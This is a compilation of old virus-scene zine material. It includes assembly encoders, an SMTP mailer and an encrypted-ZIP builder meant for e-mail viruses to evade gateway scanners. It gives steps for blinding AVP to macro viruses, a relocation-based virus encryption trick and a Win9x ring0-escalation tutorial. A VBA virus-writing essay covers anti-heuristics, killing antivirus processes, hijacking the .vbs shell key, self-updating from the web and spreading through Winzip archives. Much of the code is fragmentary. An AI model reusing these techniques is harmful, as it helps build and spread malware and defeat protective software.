PUSH (76/4)*3
PUSH ESI
PUSH [Input_Handle]
CALL ReadFile
PUSH EDI
PUSH 76/4
POP ECX
MOV CL, 8
LODSB
SHL EAX, CL
LODSB
SHL EAX, CL
LODSB
SHL EAX, CL
MOV CL, 4
ROL EAX, 8
XLAT
STOSB
LOOP Encode_Byte
POP ECX
LOOP Encode_Packet
POP EAX
PUSH 0
PUSH OFFSET IO_Bytes_Count
PUSH 78
PUSH EAX
PUSH [Output_Handle]
CALL WriteFile
POP ECX
LOOP Encode_Line
PUSH 0
CALL @5
IO_Bytes_Count DD 0
@5: PUSH (@7-@6)
CALL @7
@6: DB '--ir--', 0Dh, 0Ah
@7: PUSH [Output_Handle]
CALL WriteFile
PUSH 12345678h
Output_Handle = DWORD PTR $-4
CALL CloseHandle
PUSH 12345678h
Input_Handle = DWORD PTR $-4
CALL CloseHandle
Exit: PUSH 0
CALL ExitProcess
Encoding_Table: DB 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
DB 'abcdefghijklmnopqrstuvwxyz'
DB '0123456789+/'
END START
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MIME.ASM]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[UUENCODE.ASM]ÄÄÄ
; UUENCODE attachment encoder.
.386
.MODEL FLAT
.DATA
EXTRN ExitProcess:PROC
EXTRN CreateFileA:PROC
EXTRN CloseHandle:PROC
EXTRN ReadFile:PROC
EXTRN WriteFile:PROC
EXTRN GetFileSize:PROC
START:
XOR EBX, EBX
PUSH EBX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH OPEN_EXISTING
PUSH EBX
PUSH EBX
PUSH GENERIC_READ
CALL @1
DB 'INPUT.BIN', 0
@1: CALL CreateFileA
PUSH EBX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH CREATE_ALWAYS
PUSH EBX
PUSH EBX
PUSH GENERIC_WRITE
CALL @2
DB 'OUTPUT.UUE', 0
@2: CALL CreateFileA
PUSH EBX
PUSH OFFSET IO_Bytes_Count
PUSH 22
CALL @3
DB 'begin 644 binary.exe', 0Dh, 0Ah
@3: PUSH [Output_Handle]
CALL WriteFile
PUSH EBX
PUSH [Input_Handle]
CALL GetFileSize
DEC EDX
JS No_Round
INC EAX
PUSH 0
PUSH OFFSET IO_Bytes_Count
PUSH 45
PUSH ESI
PUSH [Input_Handle]
CALL ReadFile
CLD
Encode_DWORD: LODSD
DEC ESI
SHL EAX, 8
MOV BH, AH
ROL EAX, 8
XCHG AL, BH
ROR EAX, 8
MOV AH, BH
PUSH ECX
PUSH 4
POP ECX
SHL EAX, 8
LOOP Encode_Byte
POP ECX
LOOP Encode_DWORD
PUSH 0
PUSH OFFSET IO_Bytes_Count
PUSH 63
PUSH OFFSET Output_Buffer
PUSH [Output_Handle]
CALL WriteFile
POP ECX
LOOP Encode_Line
PUSH ECX
CALL @4
IO_Bytes_Count DD 0
@4: PUSH 8
CALL @5
DB '`', 0Dh, 0Ah, 'end', 0Dh, 0Ah
@5: PUSH [Output_Handle]
CALL WriteFile
PUSH 12345678h
Output_Handle = DWORD PTR $-4
CALL CloseHandle
PUSH 12345678h
Input_Handle = DWORD PTR $-4
CALL CloseHandle
Exit: PUSH 0
CALL ExitProcess
Input_Buffer DB 45 DUP(0)
Output_Buffer DB 63 DUP(0)
END START
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[UUENCODE.ASM]ÄÄÄ
; SMTP client.
; Sends an e-mail using the Outlook SMTP server specified in the registry.
;
.386
.MODEL FLAT
.DATA
EXTRN ExitProcess:PROC
EXTRN WSAStartup:PROC
EXTRN WSACleanup:PROC
EXTRN gethostbyname:PROC
EXTRN socket:PROC
EXTRN closesocket:PROC
EXTRN connect:PROC
EXTRN select:PROC
EXTRN recv:PROC
EXTRN send:PROC
EXTRN RegCloseKey:PROC
EXTRN RegQueryValueExA:PROC
EXTRN RegOpenKeyExA:PROC
START:
CALL Get_EIP ; Get delta offset, incase
Get_EIP: POP EBP ; someone would want to stuff
SUB EBP, (Get_EIP-START) ; this in a virus.
CALL @2
DD 9
@2: LEA EAX, [EBP+(Account_Index-START)]
PUSH EAX
PUSH EBX
PUSH EBX
CALL @3
DB 'Default Mail Account', 0
@3: PUSH DWORD PTR [EBP+(Reg_Handle-START)]
CALL RegQueryValueExA
CALL @5
DD 30
@5: LEA EAX, [EBP+(SMTP_Name-START)]
PUSH EAX
PUSH EBX
PUSH EBX
CALL @6
DB 'SMTP Server', 0
@6: PUSH DWORD PTR [EBP+(Reg_Handle-START)]
CALL RegQueryValueExA
MOV BL, 6
CALL @8 ; Time-out:
Time_Out: DD 5 ; - Seconds.
DD 0 ; - Milliseconds.
@8: PUSH EAX ; Error (not used).
PUSH EAX ; Writeability (not used).
CALL @9 ; Readability:
Socket_Set: DD 1 ; - Socket count.
Work_Socket DD 0 ; - Socket.
@9: PUSH EAX ; Unused.
CALL select
MOV BL, 1
MOVZX ECX, AX
SHR EAX, 16
ADD EAX, EBP ; Add delta offset.
PUSH ECX
PUSH 0
PUSH ECX ; Size of buffer.
PUSH EAX ; Buffer.
PUSH DWORD PTR [EBP+(Work_Socket-START)]
CALL send
POP ECX
; This is the addy the mail gets returned to when it can't be delivered.
; If you don't want to get notified of failures, use a blank addy ('<>').
; Main body.
Reg_Handle DD 0
SMTP_Name DB 30 DUP(0)
WSA_Data DB 400 DUP(0)
Buffer DB 512 DUP(0)
END START
; Constructs an encrypted .ZIP-file from an input file.
; Written to be incorporated into e-mail virii, to evade
; e-mail gateway scanners (as they can't decrypt the file).
; The decryption password can be supplied in the body of
; the e-mail, or in the filename (ie. password.is.virus.zip), etc.
;
.386
.MODEL FLAT
.DATA
EXTRN CreateFileA:PROC
EXTRN CloseHandle:PROC
EXTRN GetFileSize:PROC
EXTRN VirtualAlloc:PROC
EXTRN ReadFile:PROC
EXTRN WriteFile:PROC
EXTRN ExitProcess:PROC
EXTRN GetTickCount:PROC
Input_File DB 'INPUT.666', 0
Output_File DB 'ENCODED.ZIP', 0
CRC_Init DD 0FFFFFFFFh
File_Handle DD 0
Archive_Size DD 0
Byte_To_CRC DB 0
Temp DD 0
.CODE
START:
XOR EBP, EBP ; EBP is always 0.
PUSH File_Handle
CALL CloseHandle
PUSH (End_End_CH_Dir-Central_Header)
POP ECX
PUSH OFFSET Central_Header
POP EDX
CALL Write_File
PUSH File_Handle
CALL CloseHandle
Write_File:
PUSH EBP
PUSH OFFSET Temp
PUSH ECX
PUSH EDX
PUSH File_Handle
CALL WriteFile
RETN
Generate_Zip:
PUSHAD
PUSH (End_Cipher_Key-Cipher_Key)
POP ECX
Init_Keys: LODSB
CALL Update_Keys ; Update keys with AL.
LOOP Init_Keys
PUSH EDI
DEC EDI
XOR AL, 1
MUL BX
MOV AL, AH
CALL Update_Keys
INC EDI
LOOP Encrypt_Stream
POPAD
RETN
NOT EAX
MOVZX EAX, AL
INC EAX
NOT EAX
POPAD
RETN
Update_CRC:
PUSH 1
POP ECX
CLD
Load_Character: LODSB
XOR DL, AL
MOV AL, 8
Loop_CRC_Byte: DEC AL
JNZ CRC_Byte
LOOP Load_Character
NOT EAX
POP ESI
POP EDX
RETN
END START
How to get AVP not detecting viruses in OLE2 files:
--------------------------------------------------
I discovered this problem of AVP some time ago when i was disassembling
some routine of his code.
Procedure :
1.- Take a macro virus and check AVP is detecting it.
2.- Open the file with a hex-editor and go to 0x48 position.
3.- Look at the double word; it should be 0 if the file is not too big.
4.- Change it for other value very high (example: 0x99999999).
5.- Check the file with AVP again and you will see it doesn't detect anything.
6.- You can check that the virus is still active and Word will load the file
without any kind of problems. :-)
You also can check that all the other AVs detect it without problems.
Explanation:
OLE2 files are like an easy file system, organized into something similar as
a FAT. For big file it uses a double FAT; his size is at 0x48 position (if
it's 0 means is not being used) and in the position 0x44 is his initial
"sector".
AVP, before analyze a file, tries to check if it's corrupted. In this case
we are making believe him that the file is bigger compared with the real
size of the disk and AVP believes is truncated. That's why AVP doesn't
analyze it.
Why Word and all the other antiviruses are not having the same problem?
Because they don't try to access to that field and never will access due the
file is smaller they never need to access really to those so high positions
of the file.
Tcp/29A
Encryptation through relocs
Until now relocs section (.reloc) has been very useful (curiously by useless)
for virus coders. Why? Virus coders overwrite it to hide an increase of size
after the infection. Nothing to worry because when Windows loads an
executable it gives a new virtual address space and it will be loaded into
the base address indicated in his header and it's not necessary to apply the
relocs. That's the reason why by default some compilers don't include the
.reloc section except if you tell the contrary. Of course, it doesn't happen
the same with DLLs since it's more common they have their base already
busy (at least it's already loaded the executable and usually there will be
other DLLs) then it will must to be loaded into other base address and
applied new relocs based in the new base.
Let's see what happens when a module is loaded into another different base of
the indicated in the header and it's needed to apply relocs; each entry in
the relocs table point to the addresses of the module that are needed to be
reseted. To the content of each of these addresses is subtracted the indicated
base in the header (since it's already reseted respect to that base) and it's
added the base where it has been loaded really.
Other fact we will use is that if to an executable we put a base where we know
it will not be loaded, Windows by default tries to load it at 0x400000.
Taking care of all these, we are going to get encrypted a virus and the own
Windows will decrypt it, i mean, it will not be needed any decryption routine.
First, we need the host having his base at 0x400000 and we need to null his
relocs (if it has any). Now we change the base to the executable for one we
know Windows will not accept, per example we take 0x12345678. With this we
will get Windows loading the executable at 0x400000 and applying the relocs;
It's due to that we have nulled the relocs of the host since finally it's
being loaded his choosed base.
Now we create a new .reloc section pointing each DWORD from the body of the
virus and we encrypt every DWORD of the virus in the next way:
We do that since when Windows loads the executable at 0x400000 what it will
do will be subtract the header of the base (0x12345678) and add the real base
(0x400000).
We've gotten Windows finally decrypting our virus and then it's different
to how it was in disk without execute any instruction (it's only needed
whereupon it has been loaded into a debugger per example :-)
In NT there are limitations to the use of this method since it doesn't want to
load the executable if it finds a strange base (i believe it must to be
multiple of 64KB).
Tcp/29A
; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
; ³ Win9x Ring0 Quest ³ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
; ³ ³ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
; ³ part I ³ ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
; ³ ³ ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
; ³ by Super/29A ³ ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
;
;
;
;This is my first article about ring0, although I have been obsessed with
;this stuff for ages. In this article I'll discuss all known and unknown
;techniques we can use to obtain ring0 access in Win9x platform. I think
;ring0 quest for WinNT platform deserves its own article; I'm currently
;researching new ways to get ring0 for WinNT (including Win2000) using
;some exploits. But I'm afraid you will have to wait for a future 29A
;issue. Meanwhile, I hope you enjoy this article.
;
;I have collected some techniques from existing viruses (some of them are
;mine) and I have written some more that I believe haven't been used on
;any virus yet. If you happen to discover any other way to get ring0,
;please let me know... It'll be exciting for me to gain more ring0 power!
;
;As you have noticed, this article can be compiled with TASM32, heheheh
;I have decided to do it this way, so you can compile all code and follow
;step by step, as you read the explanations in the comments. I've tried to
;code without optimizations, so you don't suffer trying to understand what
;the code does. If by chance you find some strange code, skip it and get
;to next one ;-D
;
;Oh! btw, if you hear some ambulance in your PC speaker... don't panic ;-)
;If you hear nothing, please, go to a doctor!!! X-DDD
;
;Compile as follows:
; TASM32 -ml -m29A ring0.asm
; TLINK32 -Tpe -aa -c -x ring0.obj,ring0.exe,,import32.lib
;
;
;skip the beginning... it's boring ;-)
;(go directly to code section)
;
;
;Due to lack of time, I had to break this tutorial in two pieces. Part two
;will be available soon, along with WinNT stuff (i hope!)
;===================================================================
; LET's BEGIN ...
;===================================================================
.386p
locals
jumps
.model flat ;if u can read this, u dont need glasses hahahah
;===================================================================
; DATA SECTION
;===================================================================
.data
Freq db 08h
aNTDLL db 'NTDLL.DLL',0
aKERNEL32 db 'KERNEL32.DLL',0
GDTR db 6 dup(?)
IDTR db 6 dup(?)
LDTR dw ?
_LDTR db 6 dup(?)
FreeGDT1 dw ?
FreeLDT1 dw ?
CallGate db 6 dup(?)
VxdCall dd ?
;===================================================================
; CODE SECTION
;===================================================================
.code
;===> <===
;===> U should start reading HERE <===
;===> <===
; int 3 ;-)
push 0
push offset Msg0
push offset Msg1
push 0
call MessageBoxA
;Before jumpping to ring0, we should detect the windows platform. It should
;be Win9x, not WinNT. Here I present you many methods of doing so. They all
;should work fine... choose one...
call GetVersion
or eax,eax
jns @@WinNT
;This is a very simple and short method of detecting Win9x. The Kernel32
;is responsible for giving the control to the host (or virus entrypoint),
;by means of a "JMP EAX" instruction (that's why EAX contains the address
;of the EntryPoint in Win9x platforms). When Host gets control there is
;a dword pushed in the stack, which is the address of a KERNEL32 routine
;that gets control if we exit with a simple RET instruction. That code
;is inside KERNEL32, which has an image base of 0BFF70000h in Win9x
;platform. So, we can simply check high byte 0BFh to ensure that we
;are on Win9x.
;if you prefer a more optimized version, you can use the following code
;(only if you haven't pushed any value since you got control), extracted
;from my Repus.168 virus:
;
;(dont execute this here, because stack has been modified)
;
; pop eax
; push eax
; inc eax ; EAX<80000000h on WinNT platform
; jns @@WinNT
;We can also use GetModuleHandle API to check for modules that only WinNT
;has loaded in memory, such as: HAL.DLL, NTDLL.DLL, etc...
;Other possibility would be to use GetProcAddress API to get the address
;of a WinNT specific routine. If it doesnt exist, then we are not in WinNT
mov ecx,cs
xor cl,cl
jecxz @@WinNT
sldt cx
jcxz @@WinNT
;I think it's enough for detecting WinNT. There are a lot more ways of
;detecting WinNT platform. If you discover some short and interesting
;way, please send it to me. It would be convenient to use SEH to avoid
;unexpected errors while checking the platform. SEH can also be used
;to detect platform if you touch things that WinNT wouldn't permit it.
;I also suggest you make this checks metamorphic, so AVers cannot rely
;on this to discover suspected behaviour.
;I know you can't wait more... so, lets start the Ring0 Quest...
mov ax,[esi]
mov word ptr [_LDTR+0],ax ; save limit of LDT
mov ax,[esi+2]
mov word ptr [_LDTR+2],ax ; save LDT base
mov al,[esi+4]
mov byte ptr [_LDTR+4],al
mov al,[esi+7]
mov byte ptr [_LDTR+5],al
;The CallGate mechanism is very simple. We only need a free GDT or LDT
;entry, to fill it with the address of our ring0 code, the ring0 selector
;(we have used 28h which is Win9x ring0 code selector, but you can create
;your own ring0 code selector instead) and the right bits to make it work
;as a 32-bit callgate. To get into ring0 we just need to make a call far
;to the choosen ring0 code selector, and any offset (it doesn't matter
;which one we use); in our example we have shoosen a null offset. When
;our ring0 code gets control, CS:EIP has been pushed into the stack,
;so in order to get back to ring3, we must use the RETF instruction.
call Search_GDT
mov [FreeGDT1],ax
and dword ptr [CallGate],0
mov word ptr [CallGate+4],ax
call Search_LDT
or al,4
mov [FreeLDT1],ax
;We can do the same with interrupt 03h, using the int3 one-byte opcode
;or the two-byte interrupt instruction:
push dword ptr [esi+(8*3)+0] ; save IDT entry
push dword ptr [esi+(8*3)+4]
db 0CDh,03h ; ring0!
;If you want more anti-debugging ways, try to use interrupt 01h. You can
;use the interrupt instruction (2 bytes) or you can use the undocumented
;opcode 0F1h which has the same effect (it may not work on some weird
;processors?)
db 0CDh,01h ; ring0!
db 0F1h ; ring0!
;Now, we are gonna use another interrupt, no matter which one (but inside
;the IDT limits!), so we'll not only need to write the address of our ring0
;handler, but also the characteristics of the IDT descriptor, as well as
;the ring0 code selector. Lets try with interrupt 20h (used from ring0 to
;call VxD services, so if you use them, don't forget to restore IDT entry!)
;Lets have more fun with interrupts... Now we'll use last IDT entry:
mov eax,ebx
shl eax,5
add eax,90C300CDh
push eax
call esp ; execute in stack: "int N" --> ring0!
pop eax
;We already played with interrupts 01h and 03h in previous examples issuing
;a software interrupt, but now the processor is gonna do it for us. We'll
;generate a 01h trap exception activating TF flag, to force a single-step
;execution. As a result, the interrupt 01h will take control. Don't forget
;to disable TF inside int1, so that it don't get execute again and again
;(imagine what could happen if single-step is activated while restoring
;int1 original handler!)
pushfd
pop eax
or ah,1
push eax
popfd ; TF=1
nop ; ring0!
pushfd
pop eax
or ah,80h
push eax
popfd ; OF=1
into ; ring0!
xor eax,eax
div eax ; ring0!
mov edx,1
mov eax,0
div edx ; ring0!
push 2
push 1
xor eax,eax ; 0 is not between 1 and 2 :-)
pop eax
pop eax
db 0FFh,0FFh
;As you can see, there are plenty of ways to generate an exception,
;and take control in ring0 priviledge. You can even patch the original
;handler with a jump without modifying IDT entry. Discover your own way.
;Be original! don't copy from this tutorial! :-)
;I think, I'll stop here... I have no time... I will just present you
;some of the titles for part two... perhaps it gives you some ideas...
@@Finish:
push 0
push offset Msg0
push offset Msg2
push 0
call MessageBoxA
jmp @@Exit
@@WinNT:
push 0
push offset Msg0
push offset Msg3
push 0
call MessageBoxA
@@Exit:
push 0
call ExitProcess
Start endp
;-------------------------------------------------------------------
pushad
popad
ret
Get_VxdCall endp
;-------------------------------------------------------------------
pushad
@@1:
@@2:
add eax,8
;if we haven't found any free GDT entry, lets use the last two entries
@@3:
popad
ret
Search_GDT endp
;-------------------------------------------------------------------
pushad
@@1:
@@2:
add eax,8
;if we haven't found any free GDT entry, lets use the last two entries
sub eax,7
@@3:
popad
ret
Search_LDT endp
;-------------------------------------------------------------------
pushad
call Beep
popad
ret
Ring0Code_ret endp
;-------------------------------------------------------------------
pushad
call Beep
popad
retf
Ring0Code_retf endp
;-------------------------------------------------------------------
pushad
call Beep
popad
iretd
Ring0Code_iret endp
;-------------------------------------------------------------------
pushad
call Beep
popad
iretd
Ring0Code_int1 endp
;-------------------------------------------------------------------
pushad
call Beep
popad
iretd
Ring0Code_div endp
;-------------------------------------------------------------------
pushad
call Beep
popad
Ring0Code_bound endp
;-------------------------------------------------------------------
pushad
call Beep
popad
iretd
Ring0Code_arpl endp
;-------------------------------------------------------------------
pushad
mov al,0B6h
out 43h,al
mov al,[Freq]
out 42h,al
out 42h,al
xor byte ptr [Freq],0Ch ; Choose another frequency for next beep
; It sounds like an ambulance X-DDD
in al,61h
or al,3
out 61h,al
mov ecx,1000000h
loop $
and al,0FCh
out 61h,al
popad
ret
Beep endp
;===================================================================
;===================================================================
ends
end Start ; yeah! its the end! :-)SUB
? ? ?
? ____
/ \ ?
Four elephants on a tortoise! ? / \ _ \ ?
(An essay about advanced VBx) ( .o o. ) ___
.by jackie __/ ^ \/ \
/ \___o____ \
.Introduction
Hi there kids, this is your phunky ol' retired friend (!) back with another
sloppy tutorial about four elephants on a tourtoise. In this essay I'm going
to talk about some kewl topics concerning coding viruses in VBx. Check the
short table of contents.
As you see, more or less no one of all you macro coders out there plays a-
round with these stuff, except a few guys (the old punks, hehehe, hi there
guys!) sat down for a while and thought about technics like these. As a fact
out of this, your creations get detect as Class.xx, Marker.xx, Across.xx,
LoveLetter.xx, and so on, as you see, it seems like all your stuff is hacked
shit for the AV community. Well, oh boy, the answer is easy, because most of
you guys just use old technics, old sceme's, old shit, old hacks instead of
sitting down, thinking, trying and researching. As output we can see masses
of lame macros. That's why there are 36 variants of Marker, because you guys
just change this and that in code, not because Spo0ky has written all of 'em
that was you guys. X-D And one thing you should have in front of your eyes,
what counts in VX community is the quality of coding and not the quantity.
No one will care if you write 1000s of viruses which are all just hacks and
strains. My friends, it's time to wake up and realize that virus coding is
not a thing of destruction, it's a thing of art. Every single line of code
represents it's coder. I know that there are too much lame wanna-be 'coders'
around which behave like the sickest guys on earth with the 'Yo, man, I code
virii man, get outta my way man!' attitude. These are the ones that try to
show off in front of their computer - friends. These are the ones that rep-
lace original signatures and names in original authors code and claim to be
a virus writer. Hihihi. If you are such a guy, I feel very sorry for your
poor stupid mind. It's time to change young coder. Otherwise you will never
get it and you will never be accepted and understood. The best example for
lameness and attitude problems combined with the topic of viruses, is the
virus section of the messageboard on a german ' hackers ' site. Viruses are
not made to destroy data of your ex-friend, etc get that kiddies. I could
talk and discust about these guys hours and hours, but this is not topic of
this paper. I'm sorry dear reader, but I do not want you to get like that
lamer's around the cyberspace. X-D So, after that short column about general
attitude, we can start with our first topic today, let see what we will have
before going to bed...
I see, ya're still here young coder. Okies, let see what we got for today.
I am gonna tell you about the thing called 'Antiheuristics'. Well, some time
ago, the AV community decided to use such a thing as 'Heuristic' to scan for
viruses, which really helped 'em a lot to detect viruses, and they still use
it. XD. Ok, as you might have realized, it's some kinda special technic to
detect viruses and the thing we can do is called 'Antiheuristic', which are
technics that can avoid heuristic detection of your virus. If you are the
proud owner of a copy of Norton AntiVirus 5.X or higher, you might have not-
iced that thing which is called ' Bloodhound '. Heh, this is NAV's heuristic
engine. Pretty rad. XD. I think you have had your expiriences with it, but
it's really easy to fake and I will show you how.
First you must get in your head that the best medicine against heuristic is
a ' strange ' coding style. I mean, try to code not in the normal way, your
code might look strange, but, it's not detected. XD. For general information
about easy anti - heuristic coding please refer to my other tutorial called
'A phreaky macro primer'. You should find some basics in chapter 15.
I used the object ' Application ' three times, result is that the heuristic
won't get it as it is meant to be.
As you can see, I used the object 'VBA' infront, which has the same result
for our purpose, but it fakes the heuristic.
Word.Application.Options.VirusProtection = j
Again, the object ' Word ' infront and something special behind, a variable
without type and value. It werks! XD
j = j + 1
Set objCheesy = Word.Application.VBProject.VBComponents(j).CodeModule
I replaced the '1' for the component with a variable with the value '1'. It
is just a basic trick.
As you can see, it looks strange, but it werks fine. You might have noticed
what I mean with 'strange' - coding style. XD. To fake a heuristic you just
need to sit down for a while and think, try, research as I said before. Well
this were some methods to code antiheuristic code and another one is to add
encryption, remove obvious commands, etc. I hope you got what anti-heuristic
means and what's it's purpose on virus coding. Btw, here are three lines of
code that have not so much to do with anti - heuristic but with killing AV
monitors. It's take from my W97M.Co0kie virus XD. Enjoy!
For y = 1 To Tasks.Count
If InStr(1, LCase(Tasks(y).Name), "vir") Then Tasks(y).Close
Next
This little piece of code does not more than kill all tasks that could be a
virus scanner. XD.
In the end of the chapter about anti - heuristic I wanted to tell you that
you can use this technics in all areas, not only in Word. XD. I just did the
Word compatible code as an example, because most of you have never touched
any other application.
.Language and user independent coding
Dear young coder, you're still with me? Kewlie. Okies, let me get you into
another chapter concerning 'language and user independent coding' this time.
As you coded your creations, or not, you might have noticed that if you want
ed to some stuff like a worm script for mIRC, or use Winzip, or any other
application. The key to our needs is to use the registry to get all needed
information about the application we want to abuse. For example I will show
you now how to get the 'Program files' directory.
p = Application.System.PrivateProfileString("", _
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", _
"ProgramFilesDir")
This example werks for Word97, but it's easy to get the path from any other
Office application too. Just export the regkey with the shell command using
'regedit.exe' and read it into a string and use InStr(), Mid(), etc to get
the needed string. Easy, isn't it? But I want YOU to code, so no examples
for you. XD. Another example to get the windows directory, no matter if we
are in Win9X or WinNT, is to use the Environ() function. Lemme show you how.
w = VBA.Environ("windir")
Well, nearly all programs do have entrys in the windows registry where you
can get informations like installation path, save directories, etc. Just try
to research a bit. You can see that this is a kewl method to get dir's, etc
because every infected user could have windows in another directory than you
or anyone else, even the directory for the programs. So if you want to get
language independent use this tricks. XD.
Another thing I'm going to talk about in this paper is the infection of
Excel class modules. Well, I'm pretty sure that 90% of you dear readers have
never touched Excel or any other application than Word to write macros. Ok,
there is something that was a stone in my way of infecting Excel class stuff
since the first one was born. Lemme give you a brief intro to it.
The Excel class module can't be accessed via stuff like using the ordinary
command like '.VBComponents(1)', because the first component varies in every
.xls file. So we were forced to use the name of the class module which is in
english versions of Excel named 'ThisWorkbook'. Okies, so all viruses which
used this technic would only work under the version which they where hard-
coded for. ie 'DieseArbeitsmappe' for german version.
As I had nothing better to do, I sat down for a while and thought about a
solution to fix this language problem. Well, as God wanted, I found a little
trick to solve the problem. The class module of every VBA project has a spe-
cial number of properties on which I could identify it as Class module. Look
at the piece of code below taken from my X97M.fireal, the first class virus
that is able to spread under all version of Excel, no matter what language.
First I walk through all the components and get the one I want and save the
virus code for later use in a variable. That's the routine fireal uses to
get its code. And I use the same style to find new classes to infect.
For Each fireal In book.VBProject.VBComponents
If fireal.Properties.Count = 73
[...]
End If
Next
This technic is called 'Fireal-technic' and I'm sorry, I'm too stoned to re
member why it has such a name!?. XD. I should take some vitamin pills. Okies
I hope you got the clue and understood what I wanted to teach y'all young
coders.
In this chapter I will tell y'all something about the infection of write-
protected files and how to infect them. You will see it's pretty easy to in-
fect write protected files, but it has one point that we have to notice. The
technic described here only works under Word97 SR-1 or higher and Word2000.
Besides that there are two kinds of protection, the normal write-protection
of windows and the VBA project protection. We can't yet infect documents
which are protected by VBA, but protected files by windows. Okies, let's
drop some code.
If GetAttr(ActiveDocument.FullName) = 1 Then
SetAttr ActiveDocument.FullName, 0
ActiveDocument.Reload
End If
[...]
SetAttr ActiveDocument.FullName, 1
Yummie, yummie. I hope everything fits tight ... XD. While the world keeps
spinning around, I am gonna tell the young coders out there something about
a phreaky way to infect .vbs files. Since .vbs viruses use this same old te-
chnic to search and infect files, I took some of my little time and invented
some new technic to do it. It has to do something with hooking, because each
.vbs file that gets executed gets infected too. Well, the theory is easy and
the example code too. Let's see some code about the ' jackie theory of .vbs
infection'. First of all you need the arguments.
objArguments.Count
objArguments(0)
objArguments(1)
[...etc...]
As you see, you can easy use this commands to make your .vbs virus kinda
resisdent. Just get the regkey of the .vbs shell, by using this:
varCurrentShell = objShell.RegRead _
("HKEY_CLASSES_ROOT\VBSFile\Shell\Open\Command\")
Now you add yourself to this shell command, for example the new shell would
be ' c:\windows\wscript.exe infinity.vbs %1 ' or kinda equal. Now every .vbs
file gets executed via your infected .vbs file. So it's an easy trick to get
the path and infect all the files in that path, inclusive the executed .vbs
file. Ohhh , last but not least you have to execute the just infected .vbs
file by our virus, otherwise it wound run. Just use this.
That's all for that topic today. I wrote VBS/Infinity, which uses this tech
nic. Just toy a bit around with that code pieces. All is said and done. xD
Back with another topic today, I am going to tell ya'll young coders about
a new interesting technic in virus coding. The vision of a virus which is
capable to update itself via the WWW. Well, Vecna did it first (Ya rule man)
in Asm and I did it after that for all the macro people out there. xD.
There are two technics which I researched, the first one is used my little
example virus called W97M/One. It uses (Radio)ActiveX to update itself. Just
take a close look at the code below.
Well, all we do is getting an ActiveX object, after that we make a loop un-
til our beloved IE is loaded. Then we let IE load our source code file or
whatever and make a loop again until IE loaded the file. We store the text
which is our source code, into a variable and voila, we have some new piece
of code in it, so it's your decision what you do with it now. xD.
My W97M/One uses some ID and an internal version number to check for an up-
date. This helps if there was no active connection, or the file wasn't found
for any other reason. Just be creative, well, at least a bit.
The second technic uses FTP.EXE to get file from the net. All you need is
an ftp where you can upload your updates. xD.
Now you should have your file on the users hdd and you can work with it but
it's not part of that paper to tell you how. Check it out for yourself. xD
As you see, it's not the big deal, and as Mister Sandman says, the most im-
portant thing is to be creative. xD. Here you are! As I said, just toy a bit
with that.
Fasten your seatbelt young coder, in this last chapter of 'Four elephants
on a tortoise!' I'm gonna show you some of the lastest developements. I have
to say that this one is my favourite. XD. I'm going to tell y'all about the
kewl tool Winzip and it's viral capabilities. What would you think if your
virus adds itself to every .zip archive it can find on the user's pc? Rad?!
Aight! As you have to know, I have nothing better to do than writing shitty
papers about elephants and tortoises, just that you can learn a bit out of
them. Okies, the first step to use this kewl technic is that you have to
check for the path where Winzip is installed on the local machine.
As you read before you can use the registry to get the needed information.
Would I be out of line if I give you an example? Naawww. XD. Okies, let's
have here some code to learn. It's taken from my WM97/2000.Incubus.
z = Application.System.PrivateProfileString("", _
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows" & _
"\CurrentVersion\App Paths\winzip32.exe", "")
We got the path of Winzip into the variable 'z'. XD. Well, that you know, I
am not going to show you how to search for .zip files. Use VBA commands or
do some .vbs file as Incubus does. After you got some .zip files, you can
use the following to add your virus to the file.
I hope I needn't to say that your file must have pathinformation included.
For example 'c:\pictures.zip' and 'c:\windows\hiddenvirus.doc' or something
like that.
If you are kinda involved into viral stuff, you might have noticed that you
can write IRC-worms using the script language of mIRC,pIRCh, etc. Btw, IRC
is the place where we meet. XD. Okies, enough. There were some worms and
viruses that spread through IRC-channels so the developer of mIRC, etc build
in some kinda protection against some filetypes. Actually all kewl filetypes
like .exe, .com, .vbs, .doc, etc are ignored, so I came to the idea to let
my macro zip itself to get save through the IRC-channels. XD. There are only
two viruses which do it, it's first Co0kie and second Incubus, both by ehm..
my humble person. The concept is easy, the code too. Lemme drop you here an
example taken from Co0kie.
z = Application.System.PrivateProfileString("", _
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows" & _
"\CurrentVersion\App Paths\winzip32.exe", "")
w = Environ("windir")
Basically it's the same as the code above. As you see, it creates a .zip
file into the windows directory. The best on this is that mIRC doesn't have
.zip files on it's damn auto-ignore phuckshit. XD.
There are some other parameters for Winzip which are more or less usefull
for your viruses. Maybe you can need 'em. Use '-f' to renew the archive, '-m
' to move, '-u' to update, '-r' to include subdirs, '-p' to include path,
'-ex' for maximum of compression, etc, etc...
.Outroduction
Finally, another strange paper you read and I wrote, reaches it's end. Last
but not least, I have to mention a few kewl coders, which werk I really app-
